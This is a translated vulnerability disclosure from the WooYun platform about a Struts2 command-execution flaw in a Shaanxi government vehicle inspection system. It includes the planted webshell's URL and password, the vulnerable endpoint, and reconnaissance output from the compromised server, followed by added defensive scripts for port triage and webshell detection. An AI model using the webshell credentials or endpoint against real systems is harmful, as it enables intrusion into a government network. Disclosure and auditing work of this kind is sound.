
Vulnerability summary

Defect ID: wooyun-2014-069099

Title: Command execution and file upload vulnerabilities in the Shaanxi Entry-Exit Inspection and Quarantine Bureau's imported vehicle registration and inspection management system

Affected vendor: snciq.gov.cn

Author: 阿海

Submitted: 2014-07-20 19:51

Fix time: 2014-09-03 19:52

Published: 2014-09-03 19:52

Vulnerability type: command execution

Severity: high

Self-assessed rank: 20

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-07-20: Details sent to the vendor; awaiting the vendor's handling
2014-07-25: Vendor confirmed; details disclosed to the vendor only
2014-08-04: Details disclosed to core white hats and experts in the relevant field
2014-08-14: Details disclosed to regular white hats
2014-08-24: Details disclosed to intern white hats
2014-09-03: Details disclosed to the public

Summary:

The Shaanxi Entry-Exit Inspection and Quarantine Bureau's imported vehicle registration and inspection management system has command execution and file upload vulnerabilities. The entire site is compromised, which can lead to penetration of the internal network. Several webshells have already been planted on it by others, and to this day it has not been fixed.

Details:

Backdoor address: http://www.snciq.gov.cn:6198/car/common/file8.jsp
D:\tomcat7\webapps\car\car\common>net start
==============================================================================================================================
已经启动以下 Windows 服务:
Application Experience Lookup Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Java Quick Starter
Logical Disk Manager
Network Connections
Network Location Awareness (NLA)
OracleDBConsoleorcl
OracleOraDb10g_home1iSQL*Plus
OracleOraDb10g_home1TNSListener
OracleServiceORCL
Plug and Play
Print Spooler
Protected Storage
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Terminal Services
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
D:\tomcat7\webapps\car\car\common>net localgroup
==============================================================================================================================
\\CAR 的别名
-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Distributed COM Users
*Guests
*HelpServicesGroup
*Network Configuration Operators
*ora_dba
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users
D:\tomcat7\webapps\car\car\common>net user
==============================================================================================================================
\\CAR 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest jxzz
SUPPORT_388945a0
D:\tomcat7\webapps\car\car\common>netstat -an
==============================================================================================================================
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1056 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1158 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1521 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3938 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5520 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5560 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5580 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1046 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1521 127.0.0.1:3645 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3646 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3647 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3648 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3649 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3653 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3654 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3655 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3657 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3658 ESTABLISHED
TCP 127.0.0.1:3645 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3646 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3647 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3648 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3649 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3653 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3654 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3655 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3657 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3658 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:5152 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING
TCP 192.168.1.8:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:1230 192.168.1.8:1158 TIME_WAIT
TCP 192.168.1.8:1232 192.168.1.8:1521 TIME_WAIT
TCP 192.168.1.8:1233 192.168.1.8:1521 TIME_WAIT
TCP 192.168.1.8:1234 192.168.1.8:1521 TIME_WAIT
TCP 192.168.1.8:1237 192.168.1.8:1158 TIME_WAIT
TCP 192.168.1.8:1240 192.168.1.8:1158 TIME_WAIT
TCP 192.168.1.8:1521 192.168.1.8:1898 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:1917 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:1918 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:1969 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:2502 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:2503 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:4610 ESTABLISHED
TCP 192.168.1.8:1898 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:1917 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:1918 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:1969 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:2502 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:2503 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:3938 192.168.1.8:1229 TIME_WAIT
TCP 192.168.1.8:3938 192.168.1.8:1231 TIME_WAIT
TCP 192.168.1.8:3938 192.168.1.8:1236 TIME_WAIT
TCP 192.168.1.8:3938 192.168.1.8:1238 TIME_WAIT
TCP 192.168.1.8:3938 192.168.1.8:1241 TIME_WAIT
TCP 192.168.1.8:4610 192.168.1.8:1521 ESTABLISHED
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1026 *:*
UDP 0.0.0.0:4500 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1027 *:*
UDP 192.168.1.8:123 *:*
UDP 192.168.1.8:137 *:*
UDP 192.168.1.8:138 *:*
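The `netstat -an` listing above shows the Oracle TNS listener (1521), RDP (3389), SMB (445) and the Tomcat AJP connector (8009) bound to 0.0.0.0, which is why a single webshell on this host turns into the intranet exposure the summary warns about. The script below is an added example, not code from the original report: it parses a Windows `netstat -an` listing and flags every listener reachable from the network. The sample lines are a subset copied from the listing above; the port-to-service map and the set of ports treated as high risk are assumptions chosen for illustration.

```python
"""Triage a Windows `netstat -an` listing for network-reachable services.

Added example for this report, not code from the original post. The sample
below is a subset of the listing in the report; KNOWN_PORTS and HIGH_RISK are
assumed values chosen for illustration.
"""
import re
from collections import namedtuple

Socket = namedtuple("Socket", "proto local_ip local_port remote state")

# Constructed sample: selected lines from the report's netstat -an output.
SAMPLE_NETSTAT = """\
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1521 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1521 127.0.0.1:3645 ESTABLISHED
TCP 192.168.1.8:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 192.168.1.8:137 *:*
"""

# Assumed service names for the ports seen in the report (IANA / vendor defaults).
KNOWN_PORTS = {
    135: "MSRPC endpoint mapper", 137: "NetBIOS name service",
    139: "NetBIOS session", 445: "SMB", 1521: "Oracle TNS listener",
    3389: "RDP", 8005: "Tomcat shutdown port",
    8009: "Tomcat AJP connector", 8080: "Tomcat HTTP",
}
# Assumed policy: database and management ports that should never be reachable
# from outside the host, let alone from the internet.
HIGH_RISK = {135, 137, 139, 445, 1521, 3389, 8009}

LINE_RE = re.compile(r"^(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?$")


def parse_netstat(text):
    """Parse the Proto/Local/Foreign/State columns; header and separator lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        proto, ip, port, remote, state = m.groups()
        sockets.append(Socket(proto, ip, int(port), remote, state or ""))
    return sockets


def exposed_listeners(sockets):
    """Listeners on a non-loopback address: every TCP LISTENING socket and every
    UDP socket (UDP rows carry no state column) whose local IP is not 127.x."""
    out = []
    for s in sockets:
        listening = s.state == "LISTENING" or s.proto == "UDP"
        if listening and not s.local_ip.startswith("127."):
            out.append(s)
    return sorted(out, key=lambda s: (s.local_port, s.proto))


def high_risk_ports(sockets):
    """Unique exposed port numbers that fall in the assumed HIGH_RISK set."""
    return sorted({s.local_port for s in exposed_listeners(sockets)} & HIGH_RISK)


def report(text):
    """One human-readable line per exposed listener, with the risk flag."""
    lines = []
    for s in exposed_listeners(parse_netstat(text)):
        name = KNOWN_PORTS.get(s.local_port, "unknown")
        flag = "HIGH RISK" if s.local_port in HIGH_RISK else "review"
        lines.append(f"{s.proto:<3} {s.local_ip}:{s.local_port:<5} {name:<24} {flag}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_NETSTAT)))
```

Run against a live capture, every `HIGH RISK` line is a service that should be firewalled to the management network or bound to 127.0.0.1 (as the Tomcat shutdown port 8005 already is on this host); the `review` lines (here only 8080) are the services that are meant to be public and therefore need patching, such as the Struts2 application itself.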

Proof of vulnerability:

[Screenshot: 2.jpg]

[Screenshot: 1.jpg]

Webshell address: http://www.snciq.gov.cn:6198/car/common/file8.jsp  password: shenma
Struts2 issue: http://www.snciq.gov.cn:6198/car/login.action

Fix recommendation:

Upgrade Struts2 to version 2.3.15 or later; the remaining remediation steps are the obvious ones.
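Two checks follow directly from this remediation: confirm that no `struts2-core` jar older than 2.3.15 remains under the Tomcat `webapps` tree, and sweep the same tree for JSP files that spawn processes, since the planted `file8.jsp` would not have gone away with the upgrade. The script below is an added example, not code from the original post or from any project. It builds a small constructed fixture in a temporary directory that mirrors the `D:\tomcat7\webapps\car` layout seen in the command output (the jar version in the fixture is constructed, the report does not state the installed version); the indicator patterns are assumptions and will not catch every obfuscated shell, so a hit is a lead for review, not proof.

```python
"""Audit a Tomcat webapps tree for the two issues in this report: an outdated
struts2-core jar and JSP files that execute OS commands.

Added example, not part of the original post or any project's code. The
fixture built by build_sample_webapps() is constructed to mirror the report's
D:\\tomcat7\\webapps\\car layout; the indicator patterns are assumptions and
will not catch every obfuscated webshell, so treat a hit as a lead, not proof.
"""
import re
import tempfile
from pathlib import Path

# The report's remediation: Struts2 2.3.15 or later.
MIN_STRUTS = (2, 3, 15)

# Matches struts2-core-2.3.14.jar as well as four-part names like 2.3.15.1.
JAR_RE = re.compile(r"struts2-core-(\d+)\.(\d+)\.(\d+)(?:\.\d+)?\.jar$")

# Assumed indicators: a business JSP has no reason to spawn processes or to
# write a request parameter straight to disk.
JSP_INDICATORS = {
    "runtime-exec": re.compile(r"Runtime\.getRuntime\(\)\.exec"),
    "process-builder": re.compile(r"\bProcessBuilder\b"),
    "param-to-file": re.compile(r"getParameter\(.*?\).*FileOutputStream", re.S),
}


def parse_struts_version(jar_name):
    """'struts2-core-2.3.15.1.jar' -> (2, 3, 15); None if not a struts2-core jar."""
    m = JAR_RE.search(jar_name)
    return tuple(int(x) for x in m.groups()) if m else None


def outdated_struts_jars(webapps):
    """(relative path, version) for every struts2-core jar below MIN_STRUTS."""
    webapps = Path(webapps)
    findings = []
    for jar in webapps.rglob("struts2-core-*.jar"):
        ver = parse_struts_version(jar.name)
        if ver is not None and ver < MIN_STRUTS:
            findings.append((jar.relative_to(webapps).as_posix(), ".".join(map(str, ver))))
    return sorted(findings)


def suspicious_jsps(webapps):
    """(relative path, [indicator names]) for every JSP matching at least one indicator."""
    webapps = Path(webapps)
    findings = []
    for jsp in webapps.rglob("*.jsp"):
        text = jsp.read_text(encoding="utf-8", errors="ignore")
        hits = sorted(name for name, pat in JSP_INDICATORS.items() if pat.search(text))
        if hits:
            findings.append((jsp.relative_to(webapps).as_posix(), hits))
    return sorted(findings)


def build_sample_webapps():
    """Constructed fixture in a temp dir: one outdated jar, one planted JSP, one benign JSP."""
    root = Path(tempfile.mkdtemp())
    lib = root / "car" / "WEB-INF" / "lib"
    lib.mkdir(parents=True)
    # Constructed version number; the report does not say which version was installed.
    (lib / "struts2-core-2.3.14.jar").write_bytes(b"")
    common = root / "car" / "common"
    common.mkdir(parents=True)
    # Stub standing in for the planted file: it carries only the indicator tokens.
    (common / "file8.jsp").write_text(
        "<%-- stub: Runtime.getRuntime().exec / ProcessBuilder --%>", encoding="utf-8")
    (root / "car" / "index.jsp").write_text(
        "<html>vehicle inspection login</html>", encoding="utf-8")
    return root


if __name__ == "__main__":
    root = build_sample_webapps()
    print("outdated struts2:", outdated_struts_jars(root))
    print("suspicious jsps:", suspicious_jsps(root))
```

Point `outdated_struts_jars` and `suspicious_jsps` at the real `webapps` directory instead of the fixture to run the audit; the version tuple comparison treats any 2.3.15.x build as acceptable, matching the report's "2.3.15 or later".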

Copyright notice: when reposting, please credit the source as 阿海@乌云


Vulnerability response

Vendor response:

Severity: medium

Vulnerability rank: 10

Confirmed: 2014-07-25 12:17

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded via CNCERT to the Shaanxi branch center, which will follow up with the website's administering unit for handling. Rated rank 10 under the general software vulnerability scoring.

Latest status:

None yet